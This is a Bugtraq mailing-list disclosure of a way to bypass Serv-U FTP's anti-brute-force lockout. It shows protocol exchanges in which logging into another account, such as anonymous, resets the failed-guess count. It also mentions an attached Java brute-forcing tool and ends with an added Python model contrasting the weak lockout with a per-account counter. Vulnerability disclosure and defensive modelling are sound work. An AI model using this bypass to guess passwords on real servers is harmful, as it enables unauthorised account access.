Bugtraq mailing list archives
Brute Forcing FTP Servers with enabled anti-hammering (anti brute-force) modus
From: Craig <Craig () FREENET DE>
Date: Sun, 29 Oct 2000 14:16:54 +0100
Brute Forcing FTP Servers with enabled anti-hammering (anti brute-force) modus
-----------------------------------------------------------------------------

While playing around with Serv-U FTP Server, I found out that it is possible to bypass its hammering protection, which should protect accounts from being brute-forced. In the following text I will explain this step by step.

A user logs into an ftp server like this:

USER USERNAME
PASS PASSWORD

When the user has entered an invalid password 3 times he will be disconnected and is not allowed to connect again for a specified time - so far so good, but I wondered what happened if I tried another user's account in order to try 3 passwords for every user per connection (lines with the prefix ">" are from the server):

USER USER1
> 331 User name okay, need password.
PASS PASSWORD
> 530 Not logged in.
USER USER1
> 331 User name okay, need password.
PASS nextpassPASSWORD
> 530 Not logged in.
USER USER2
> 331 User name okay, need password.
PASS anotherPASSWORD
> 530 Not logged in.

I was disconnected, and already about to give up when I noticed that anonymous login was enabled:

USER USER1
> 331 User name okay, need password.
PASS PASSWORD
> 530 Not logged in.
USER USER1
> 331 User name okay, need password.
PASS nextpassPASSWORD
> 530 Not logged in.
USER anonymous
> 331 User name okay, please send complete E-mail address as password.
PASS somemail () address com
> 230 User logged in, proceed.
USER USERNAME
> 331 User name okay, need password.
PASS 3rdPASSWORD
> 530 Not logged in.
USER USERNAME
> 331 User name okay, need password.
PASS 4thPASSWORD
> 530 Not logged in.
...
...

BINGO! That worked! This does not only work with anonymous access: you just need to log into an account and then you can retry to log into the user's account!

I coded a little program in Java to automate the brute forcing process which reads the passwords from a wordlist. In my local network it tested about 100 passwords per minute - that is not very fast, but it only uses one connection and as far as I know it's the only tool that bypasses the anti brute-force function... Brutus-aet2 (with 10 connections, 10ms timeout, disabled anti-hammering of course) made 20 tries per second - my program is only single-threaded, but if its method was implemented into brutus-aet3 it might be the fastest ftp brute-force tool ever :)

- Craig
Craig () Freenet de
http://www.HaQuarter.De (only German yet)
Download Brutus at http://www.hobbie.net/brutus

P.S.: Before writing this, I did a quick search at securityfocus, but I did not find anything about this issue; if this was already known I am sorry for wasting your time!
Attachment: newftpbrute.java
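To make the server-side mechanism concrete from the defender's point of view, here is an added Python model of the failed-login counter; it is not the post's newftpbrute.java and not Serv-U's code. It assumes the weak policy counts failures per connection and clears that count on any successful login (consistent with the two exchanges above but not stated in the post), uses a constructed user table, and replays both exchanges under the weak policy and under a counter that never resets and is also kept per target account.

```python
# Added example (not the post's newftpbrute.java). Assumption, consistent with
# the exchanges above but not stated in the post: the weak policy counts
# failures per connection and clears that count on any successful login.
MAX_FAILURES = 3

# Constructed user table standing in for the server's account database;
# a password of None means "accept any password" (the anonymous account).
USERS = {"USER1": "s3cret", "USER2": "hunter2", "anonymous": None}

def check_password(user, password):
    """True if the server would answer 230 to this USER/PASS pair."""
    if user not in USERS:
        return False
    return USERS[user] is None or USERS[user] == password

def run_session(attempts, policy):
    """Replay (user, password) pairs on one connection and return the reply
    codes, ending with 'DISCONNECT' if the server drops the session.
    'weak': per-connection count, reset by any login (the bypassed policy).
    'hardened': that count never resets, and each target account has its own
    count, so logging into some other account cannot buy more guesses."""
    conn_failures = 0
    per_account = {}
    replies = []
    for user, password in attempts:
        if check_password(user, password):
            replies.append("230")
            if policy == "weak":
                conn_failures = 0  # the reset the bypass depends on
            continue
        replies.append("530")
        conn_failures += 1
        per_account[user] = per_account.get(user, 0) + 1
        blocked = conn_failures >= MAX_FAILURES
        if policy == "hardened":
            blocked = blocked or per_account[user] >= MAX_FAILURES
        if blocked:
            replies.append("DISCONNECT")
            break
    return replies

# The two exchanges from the post, with USER1 as the account under attack.
FIRST_EXCHANGE = [("USER1", "PASSWORD"), ("USER1", "nextpassPASSWORD"),
                  ("USER2", "anotherPASSWORD")]
BYPASS_EXCHANGE = [("USER1", "PASSWORD"), ("USER1", "nextpassPASSWORD"),
                   ("anonymous", "somemail@address.com"),
                   ("USER1", "3rdPASSWORD"), ("USER1", "4thPASSWORD")]
```

In a real server the hardened counter is keyed on the client address and kept across connections (the post notes reconnecting is already blocked for a while), so that neither an intervening login nor a reconnect clears it.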